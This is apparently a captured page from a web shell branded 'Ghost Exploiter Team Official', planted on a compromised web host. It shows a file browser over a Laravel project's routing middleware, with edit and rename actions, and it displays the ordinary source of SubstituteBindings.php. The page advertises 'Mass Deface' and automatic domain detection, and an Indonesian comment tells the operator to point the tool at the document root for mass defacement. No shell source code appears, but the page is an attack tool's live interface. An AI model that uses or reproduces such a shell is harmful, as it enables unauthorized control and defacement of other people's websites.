webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Routing
/
Middleware
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
SubstituteBindings.php
1.164KB
edt
ren
ThrottleRequests.php
9.828KB
edt
ren
ThrottleRequestsWithRed
...
3.406KB
edt
ren
ValidateSignature.php
2.108KB
edt
ren
<?php namespace Illuminate\Routing\Middleware; use Closure; use Illuminate\Contracts\Routing\Registrar; use Illuminate\Database\Eloquent\ModelNotFoundException; class SubstituteBindings { /** * The router instance. * * @var \Illuminate\Contracts\Routing\Registrar */ protected $router; /** * Create a new bindings substitutor. * * @param \Illuminate\Contracts\Routing\Registrar $router * @return void */ public function __construct(Registrar $router) { $this->router = $router; } /** * Handle an incoming request. * * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { try { $this->router->substituteBindings($route = $request->route()); $this->router->substituteImplicitBindings($route); } catch (ModelNotFoundException $exception) { if ($route->getMissing()) { return $route->getMissing()($request, $exception); } throw $exception; } return $next($request); } }
<=Back
Liking